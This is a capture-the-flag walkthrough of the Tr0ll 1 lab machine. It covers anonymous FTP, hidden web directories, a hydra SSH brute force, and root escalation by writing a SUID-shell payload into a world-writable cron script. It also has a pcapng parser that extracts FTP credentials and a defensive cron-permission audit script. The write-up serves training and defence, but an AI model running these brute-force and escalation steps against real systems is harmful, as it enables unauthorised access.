[Download]: http://vulnhub.com/entry/tr0ll-1,100/
$ nmap -n -sV 192.168.108.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2014-09-12 01:50 EDT
Nmap scan report for 192.168.108.1
Host is up (0.0019s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Dynamode/Motorola WAP http config
Service Info: Device: WAP

Nmap scan report for 192.168.108.193
Host is up (0.00041s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.108.194
Host is up (0.0027s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=9/12%Time=54128998%P=x86_64-unknown-linux-gnu%r
SF:(NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
Service Info: OS: Unix

Nmap scan report for 192.168.108.197
Host is up (0.00026s latency).
All 1000 scanned ports on 192.168.108.197 are closed

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 18.53 seconds

The target is 192.168.108.194 (FTP, SSH and Apache on Ubuntu). Nmap could not match the SSH service, but the raw fingerprint already contains the banner: OpenSSH 6.6.1p1 Ubuntu-2ubuntu2.
ftp> open 192.168.108.194
Connected to 192.168.108.194.
220 (vsFTPd 3.0.2)
Name (192.168.108.194:offensive): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (192,168,108,194,58,86).
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
227 Entering Passive Mode (192,168,108,194,223,49).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (4746.3 kB/s)
ftp> quit
221 Goodbye.

Anonymous login is allowed and the only file on offer is a packet capture, itself world-writable (0777).
$ strings lol.pcap
Linux 3.12-kali1-486
Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10)
eth0
host 10.0.0.6
Linux 3.12-kali1-486
220 (vsFTPd 3.0.2)
USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 10,0,0,12,202,172
200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
226 Transfer complete.
TYPE A
200 Switching to ASCII mode.
PORT 10,0,0,12,172,74
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
QUIT
221 Goodbye.
Counters provided by dumpcap

(Single stray characters that strings picks out of packet headers have been dropped from the listing above.) The file was written by dumpcap, so despite the .pcap name it is pcapng; the "Dumpcap ..." and "Counters provided by dumpcap" strings are its section-header and interface-statistics blocks. Because FTP is cleartext, strings alone recovers the whole session: an anonymous login from 10.0.0.12 to 10.0.0.6, and the body of secret_stuff.txt, which names the hidden web directory sup3rs3cr3tdirlol. There is no need to open the capture in Wireshark for this.
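strings works here only because nothing in the capture is binary. The added example below (not part of the original write-up, and not the real lol.pcap) does the same recovery properly: it walks the pcapng blocks dumpcap emits, pulls the TCP payloads out of each frame, rebuilds the FTP control dialogue with the USER/PASS pair, and follows the PORT commands so that the file body sent over the active-mode data connection is captured as well. The sample capture is constructed inline from the dialogue shown above; the client and server addresses 10.0.0.12 and 10.0.0.6 come from the strings output, the ephemeral port 40001 is an assumption.

```python
import struct

# pcapng block types. lol.pcap was written by dumpcap, so it is pcapng despite the extension.
SHB, IDB, EPB = 0x0A0D0D0A, 0x00000001, 0x00000006
FTP_CTRL = 21


def pcapng_frames(data):
    """Yield the link-layer bytes of every Enhanced Packet Block in a pcapng buffer."""
    off, end = 0, "<"
    while off + 12 <= len(data):
        btype = struct.unpack_from(end + "I", data, off)[0]
        if btype == SHB:  # byte-order magic sets endianness for the section that follows
            end = "<" if data[off + 8:off + 12] == b"\x4d\x3c\x2b\x1a" else ">"
        blen = struct.unpack_from(end + "I", data, off + 4)[0]
        if blen < 12 or off + blen > len(data):
            break  # truncated or corrupt block: stop instead of looping forever
        if btype == EPB:  # captured length sits at +20, packet data starts at +28
            cap_len = struct.unpack_from(end + "I", data, off + 20)[0]
            yield data[off + 28:off + 28 + cap_len]
        off += blen


def tcp_segment(frame):
    """Return (src_port, dst_port, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    total = struct.unpack_from("!H", frame, 16)[0]
    tcp = 14 + ihl
    sport, dport = struct.unpack_from("!HH", frame, tcp)
    doff = (frame[tcp + 12] >> 4) * 4
    return sport, dport, frame[tcp + doff:14 + total]


def port_from_port_cmd(line):
    """'PORT h1,h2,h3,h4,p1,p2' names the client data port p1*256+p2 (active mode)."""
    h = line.split(None, 1)[1].split(",")
    return int(h[4]) * 256 + int(h[5])


def ftp_session(pcapng):
    """Rebuild the control dialogue, the USER/PASS pair, and active-mode data payloads."""
    ctrl, creds, data_ports, files = [], {}, set(), []
    for frame in pcapng_frames(pcapng):
        seg = tcp_segment(frame)
        if seg is None:
            continue
        sport, dport, payload = seg
        if FTP_CTRL in (sport, dport):
            who = "C" if dport == FTP_CTRL else "S"
            for line in payload.decode("latin-1").splitlines():
                ctrl.append(f"{who}: {line}")
                verb = line.split(" ", 1)[0].upper()
                if who == "C" and verb in ("USER", "PASS"):
                    creds[verb] = line[5:].strip()
                elif who == "C" and verb == "PORT":
                    data_ports.add(port_from_port_cmd(line))
        elif dport in data_ports and payload:  # server (port 20) -> client data connection
            files.append(payload.decode("latin-1"))
    return ctrl, creds, files


# --- constructed sample: mirrors the dialogue strings showed, it is not the real lol.pcap ---

def _frame(src, dst, sport, dport, payload):
    """Ethernet + IPv4 + TCP with zero checksums: enough for offline parsing."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload


def _block(btype, body):
    body += b"\x00" * (-len(body) % 4)  # pcapng bodies are padded to 32 bits
    return struct.pack("<II", btype, len(body) + 12) + body + struct.pack("<I", len(body) + 12)


def build_sample_pcapng():
    c, s = "10.0.0.12", "10.0.0.6"  # client / server addresses from the strings output
    flows = [
        (s, c, 21, 40001, b"220 (vsFTPd 3.0.2)\r\n"),
        (c, s, 40001, 21, b"USER anonymous\r\n"),
        (c, s, 40001, 21, b"PASS password\r\n"),
        (c, s, 40001, 21, b"PORT 10,0,0,12,202,172\r\n"),
        (c, s, 40001, 21, b"RETR secret_stuff.txt\r\n"),
        (s, c, 20, 202 * 256 + 172, b"you almost found the sup3rs3cr3tdirlol :-P\n"),
    ]
    shb = _block(SHB, struct.pack("<IHHq", 0x1A2B3C4D, 1, 0, -1))
    idb = _block(IDB, struct.pack("<HHI", 1, 0, 65535))  # linktype 1 = Ethernet
    epbs = [_block(EPB, struct.pack("<IIIII", 0, 0, i, len(f), len(f)) + f)
            for i, f in enumerate(_frame(*fl) for fl in flows)]
    return shb + idb + b"".join(epbs)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcapng()
    ctrl, creds, files = ftp_session(blob)
    print("\n".join(ctrl), creds, files, sep="\n")
```

Run it with the path to a real pcapng as the only argument, or with no argument to parse the constructed sample. The data-channel logic only handles active mode (PORT), which is what the capture on this box uses; a passive-mode session would need the 227 reply parsed the same way, with the server-side port as the key.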
http://192.168.108.194/
http://192.168.108.194/robots.txt
http://192.168.108.194/sup3rs3cr3tdirlol/
http://192.168.108.194/sup3rs3cr3tdirlol/roflmao

$ exiftool roflmao
ExifTool Version Number         : 8.60
File Name                       : roflmao
Directory                       : .
File Size                       : 7.1 kB
File Modification Date/Time     : 2014:09:11 23:02:06-04:00
File Permissions                : rw-r--r--
File Type                       : ELF executable
MIME Type                       : application/octet-stream
CPU Architecture                : 32 bit
CPU Byte Order                  : Little endian
Object File Type                : Executable file
CPU Type                        : i386

$ strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"

roflmao is a small 32-bit ELF whose only job is to print that line; there is no reason to execute a binary pulled off a target when strings gives the same answer. The "address" is not a memory address but another directory name on the web server:

http://192.168.108.194/0x0856BF/
http://192.168.108.194/0x0856BF/good_luck/which_one_lol.txt
http://192.168.108.194/0x0856BF/this_folder_contains_the_password/Pass.txt

$ cat which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
$ cat Pass.txt
Good_job_:)

which_one_lol.txt is a list of candidate usernames. Pass.txt looks like the password, but the folder name says the folder contains the password, and the file's name, not its content, is what turns out to work.
$ hydra -F -V -L which_one_lol.txt -p Pass.txt -S 192.168.108.194 ssh
Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2014-09-12 01:21:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~0 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target 192.168.108.194 - login "maleus" - pass "Pass.txt" - 1 of 10 [child 0]
[ATTEMPT] target 192.168.108.194 - login "ps-aux" - pass "Pass.txt" - 2 of 10 [child 1]
[ATTEMPT] target 192.168.108.194 - login "felux" - pass "Pass.txt" - 3 of 10 [child 2]
[ATTEMPT] target 192.168.108.194 - login "Eagle11" - pass "Pass.txt" - 4 of 10 [child 3]
[ATTEMPT] target 192.168.108.194 - login "genphlux < -- Definitely not this one" - pass "Pass.txt" - 5 of 10 [child 4]
[ATTEMPT] target 192.168.108.194 - login "usmc8892" - pass "Pass.txt" - 6 of 10 [child 5]
[ATTEMPT] target 192.168.108.194 - login "blawrg" - pass "Pass.txt" - 7 of 10 [child 6]
[ATTEMPT] target 192.168.108.194 - login "wytshadow" - pass "Pass.txt" - 8 of 10 [child 7]
[ATTEMPT] target 192.168.108.194 - login "vis1t0r" - pass "Pass.txt" - 9 of 10 [child 8]
[ATTEMPT] target 192.168.108.194 - login "overflow" - pass "Pass.txt" - 10 of 10 [child 9]
[RE-ATTEMPT] target 192.168.108.194 - login "wytshadow" - pass "Pass.txt" - 10 of 10 [child 7]
[22][ssh] host: 192.168.108.194   login: overflow   password: Pass.txt
[STATUS] attack finished for 192.168.108.194 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-09-12 01:21:32

Two things to notice in this run. Lowercase -p passes a single literal password, so hydra tried the string "Pass.txt" against every user (uppercase -P would have read the file and tried Good_job_:) instead), and that literal string is the valid password for overflow. Second, hydra feeds the user file verbatim: the annotated line "genphlux < -- Definitely not this one" was submitted as a login, so clean such lists before use. The RE-ATTEMPT line is hydra retrying a connection the server dropped, which is what the -t 4 warning is about.
$ find / -type f -perm -0002 -print 2>/dev/null | grep -v "/proc/"
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/sys/fs/cgroup/systemd/user/1002.user/10.session/cgroup.event_control
/sys/fs/cgroup/systemd/user/1002.user/cgroup.event_control
/sys/fs/cgroup/systemd/user/cgroup.event_control
/sys/fs/cgroup/systemd/cgroup.event_control
/sys/kernel/security/apparmor/.access
/lib/log/cleaner.py

Logged in as overflow, the first privilege-escalation check is for world-writable files (-perm -0002). The grep only hides /proc; the /sys cgroup and AppArmor entries are pseudo-files and noise as well, and are better pruned with find's -path ... -prune than filtered afterwards. What is left is telling: a vim swap file for cleaner.py in /var/tmp, a world-writable /var/log/cronlog, and the script itself under /lib/log, which together point at a cron job running cleaner.py.

$ ls -l /lib/log/cleaner.py
-rwxrwxrwx 1 root root 185 Sep 11 20:57 /lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
    os.system('cp /bin/sh /tmp/sh && chown root:root /tmp/sh && chmod 4775 /tmp/sh')
except:
    sys.exit()

The script is owned by root, runs as root, and is writable by everyone. The second os.system line is the payload written into it: on the next run it copies /bin/sh to /tmp/sh, gives it to root and sets the SUID bit. Since the script also wipes /tmp first, the copy is made after the cleanup, so it survives until the next run.
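The root cause is not the Python in cleaner.py but its mode: a root cron job executing a script anyone can edit. The added example below (not from the original write-up) is the check a defender, or a pentester looking for this pattern, would run: parse system crontab entries, keep the ones that run as root, and flag any absolute path they reference whose file or parent directory is world-writable or not owned by root. The cron line that drives cleaner.py is not shown anywhere on the page, so the `*/2 * * * * root python /lib/log/cleaner.py` entry in the constructed sample is an assumption; the 0777 mode on cleaner.py is the one shown above.

```python
import glob
import os
import re
import stat

# System crontab format (/etc/crontab, /etc/cron.d/*): five time fields, a user, a command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")


def root_cron_paths(crontab_text):
    """Yield every absolute path mentioned by a command that cron runs as root."""
    for line in crontab_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m or m.group("user") != "root":
            continue  # @reboot-style lines and other users' jobs are out of scope here
        for tok in m.group("cmd").split():
            if tok.startswith("/"):
                yield tok


def weak_spots(crontab_text, stat_fn=os.stat):
    """Flag root cron targets (and their parent directories) a non-root user could rewrite.

    stat_fn must return an object with st_mode and st_uid: os.stat on a live box, or the
    constructed stand-in below for an offline run."""
    found = []
    for path in root_cron_paths(crontab_text):
        for p, kind in ((path, "file"), (os.path.dirname(path) or "/", "directory")):
            try:
                st = stat_fn(p)
            except OSError:
                continue
            mode = stat.S_IMODE(st.st_mode)
            if st.st_uid != 0:
                found.append(f"{p}: {kind} owned by uid {st.st_uid}, not root")
            sticky_dir = kind == "directory" and mode & stat.S_ISVTX
            if mode & stat.S_IWOTH and not sticky_dir:
                found.append(f"{p}: {kind} is world-writable ({oct(mode)})")
    return sorted(set(found))


class FakeStat:
    """Stand-in for os.stat_result carrying only what weak_spots() reads."""
    def __init__(self, mode, uid=0):
        self.st_mode, self.st_uid = mode, uid


def stat_from(entries):
    """Turn a dict of constructed FakeStat entries into a stat_fn."""
    def _stat(path):
        if path not in entries:
            raise FileNotFoundError(path)
        return entries[path]
    return _stat


# Constructed crontab: the page never shows the cron entry, so the cleaner.py line is an
# assumption about how the script gets executed as root.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
*/2 * * * * root python /lib/log/cleaner.py
17 * * * *  root cd / && run-parts --report /etc/cron.hourly
"""

# Constructed filesystem view: cleaner.py with the 0777 mode seen on the box, everything else sane.
SAMPLE_FS = {
    "/": FakeStat(stat.S_IFDIR | 0o755),
    "/lib/log": FakeStat(stat.S_IFDIR | 0o755),
    "/lib/log/cleaner.py": FakeStat(stat.S_IFREG | 0o777),
    "/etc": FakeStat(stat.S_IFDIR | 0o755),
    "/etc/cron.hourly": FakeStat(stat.S_IFDIR | 0o755),
}


def audit_sample(fixed=False):
    """Run the check on the constructed data; fixed=True applies chmod 755 to cleaner.py."""
    fs = dict(SAMPLE_FS)
    if fixed:
        fs["/lib/log/cleaner.py"] = FakeStat(stat.S_IFREG | 0o755)
    return weak_spots(SAMPLE_CRONTAB, stat_fn=stat_from(fs))


def audit_live():
    """Check the real /etc/crontab and /etc/cron.d/* of the machine this runs on."""
    text = ""
    for f in ["/etc/crontab"] + glob.glob("/etc/cron.d/*"):
        try:
            with open(f) as fh:
                text += fh.read() + "\n"
        except OSError:
            pass
    return weak_spots(text)


if __name__ == "__main__":
    print(audit_sample())             # ['/lib/log/cleaner.py: file is world-writable (0o777)']
    print(audit_sample(fixed=True))   # []
    print(audit_live())
```

The fix the check is asking for is the obvious one: `chmod 755 /lib/log/cleaner.py` with root ownership kept, after which `audit_sample(fixed=True)` is empty. The directory check matters too: a root-owned 0755 script in a world-writable, non-sticky directory can simply be renamed away and replaced. Running `audit_live()` as an unprivileged user only sees the cron files it can read, which is exactly the attacker's view.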
$ ls -l /tmp/
total 112
-rwsrwxr-x 1 root root 112204 Sep 11 22:28 sh
$ /tmp/sh
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)

After the cron job has run (the copy is timestamped 22:28, well after the 20:57 edit of cleaner.py), /tmp/sh is a root-owned SUID shell. The real uid stays 1002 but the effective uid is 0, which is all that is needed for file access. This works because Ubuntu's /bin/sh is dash, which keeps an elevated euid; a SUID copy of bash would drop it again unless started with -p.

# ls /root
proof.txt
# cat /root/proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
Tips:
1. How to crack SSH/FTP logins? (Metasploit vs Hydra; compare the two.)
Metasploit SSH crack:
-- use auxiliary/scanner/ssh/ssh_login
-- set RHOSTS, then USER_FILE and PASS_FILE (or USERPASS_FILE), and run; STOP_ON_SUCCESS ends the scan at the first hit, like hydra's -F.
Hydra (type the command exactly as shown, on one line, with no leading spaces):
-- hydra -F -V -L user.txt -P pass.txt 192.168.1.100 -S ssh
-- Uppercase -L/-P read logins and passwords from files; lowercase -l/-p take one literal value, which is why "-p Pass.txt" above tested the string Pass.txt itself. -F exits after the first valid pair, -V prints every attempt, and -S requests an SSL connect, which the ssh module does not need (it did no harm above). Strip comments from the user file first, or they get sent as logins.
2. How to compile hydra by yourself.
3. Linux privilege escalation.